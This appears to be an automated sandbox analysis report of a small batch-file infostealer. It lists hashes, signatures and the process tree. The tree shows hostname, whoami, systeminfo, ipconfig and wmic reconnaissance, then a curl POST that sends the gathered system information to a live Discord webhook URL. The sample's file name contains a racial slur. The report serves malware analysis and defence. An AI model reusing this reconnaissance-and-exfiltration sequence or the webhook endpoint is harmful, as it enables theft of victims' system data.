Analysis
-
max time kernel
100s -
max time network
128s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
01/04/2025, 14:40
Static task
static1
Behavioral task
behavioral1
Sample
niggagimeinfo.bat
Resource
win10ltsc2021-20250314-en
windows10-ltsc_2021-x64
10 signatures
150 seconds
General
-
Target
niggagimeinfo.bat
-
Size
732B
-
MD5
a874910a487c124be0f303e1c626091c
-
SHA1
1f160820d42a658baf7b4fa3759847d2acdef6a0
-
SHA256
c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987
-
SHA512
df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041
Malware Config
Signatures
-
Hawkeye family
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 2 discord.com -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 480 WMIC.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3340 ipconfig.exe 1072 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5416 systeminfo.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 1472 whoami.exe Token: SeIncreaseQuotaPrivilege 480 WMIC.exe Token: SeSecurityPrivilege 480 WMIC.exe Token: SeTakeOwnershipPrivilege 480 WMIC.exe Token: SeLoadDriverPrivilege 480 WMIC.exe Token: SeSystemProfilePrivilege 480 WMIC.exe Token: SeSystemtimePrivilege 480 WMIC.exe Token: SeProfSingleProcessPrivilege 480 WMIC.exe Token: SeIncBasePriorityPrivilege 480 WMIC.exe Token: SeCreatePagefilePrivilege 480 WMIC.exe Token: SeBackupPrivilege 480 WMIC.exe Token: SeRestorePrivilege 480 WMIC.exe Token: SeShutdownPrivilege 480 WMIC.exe Token: SeDebugPrivilege 480 WMIC.exe Token: SeSystemEnvironmentPrivilege 480 WMIC.exe Token: SeRemoteShutdownPrivilege 480 WMIC.exe Token: SeUndockPrivilege 480 WMIC.exe Token: SeManageVolumePrivilege 480 WMIC.exe Token: 33 480 WMIC.exe Token: 34 480 WMIC.exe Token: 35 480 WMIC.exe Token: 36 480 WMIC.exe Token: SeIncreaseQuotaPrivilege 480 WMIC.exe Token: SeSecurityPrivilege 480 WMIC.exe Token: SeTakeOwnershipPrivilege 480 WMIC.exe Token: SeLoadDriverPrivilege 480 WMIC.exe Token: SeSystemProfilePrivilege 480 WMIC.exe Token: SeSystemtimePrivilege 480 WMIC.exe Token: SeProfSingleProcessPrivilege 480 WMIC.exe Token: SeIncBasePriorityPrivilege 480 WMIC.exe Token: SeCreatePagefilePrivilege 480 WMIC.exe Token: SeBackupPrivilege 480 WMIC.exe Token: SeRestorePrivilege 480 WMIC.exe Token: SeShutdownPrivilege 480 WMIC.exe Token: SeDebugPrivilege 480 WMIC.exe Token: SeSystemEnvironmentPrivilege 480 WMIC.exe Token: SeRemoteShutdownPrivilege 480 WMIC.exe Token: SeUndockPrivilege 480 WMIC.exe Token: SeManageVolumePrivilege 480 WMIC.exe Token: 33 480 WMIC.exe Token: 34 480 WMIC.exe Token: 35 480 WMIC.exe Token: 36 480 WMIC.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4948 wrote to memory of 2840 4948 cmd.exe 80 PID 4948 wrote to memory of 2840 4948 cmd.exe 80 PID 4948 wrote to memory of 1472 4948 cmd.exe 81 PID 4948 wrote to memory of 1472 4948 cmd.exe 81 PID 4948 wrote to memory of 5416 4948 cmd.exe 82 PID 4948 wrote to memory of 5416 4948 cmd.exe 82 PID 4948 wrote to memory of 5656 4948 cmd.exe 83 PID 4948 wrote to memory of 5656 4948 cmd.exe 83 PID 4948 wrote to memory of 3340 4948 cmd.exe 86 PID 4948 wrote to memory of 3340 4948 cmd.exe 86 PID 4948 wrote to memory of 2240 4948 cmd.exe 87 PID 4948 wrote to memory of 2240 4948 cmd.exe 87 PID 4948 wrote to memory of 1072 4948 cmd.exe 88 PID 4948 wrote to memory of 1072 4948 cmd.exe 88 PID 4948 wrote to memory of 4920 4948 cmd.exe 89 PID 4948 wrote to memory of 4920 4948 cmd.exe 89 PID 4948 wrote to memory of 480 4948 cmd.exe 90 PID 4948 wrote to memory of 480 4948 cmd.exe 90 PID 4948 wrote to memory of 3348 4948 cmd.exe 91 PID 4948 wrote to memory of 3348 4948 cmd.exe 91
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\HOSTNAME.EXEhostname2⤵PID:2840
-
-
C:\Windows\system32\whoami.exewhoami2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:5416
-
-
C:\Windows\system32\findstr.exefindstr /B /C:"OS Name" /C:"OS Version"2⤵PID:5656
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:3340
-
-
C:\Windows\system32\findstr.exefindstr IPv62⤵PID:2240
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:1072
-
-
C:\Windows\system32\findstr.exefindstr IPv42⤵PID:4920
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption, freespace, size2⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:480
-
-
C:\Windows\system32\curl.execurl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"2⤵PID:3348
-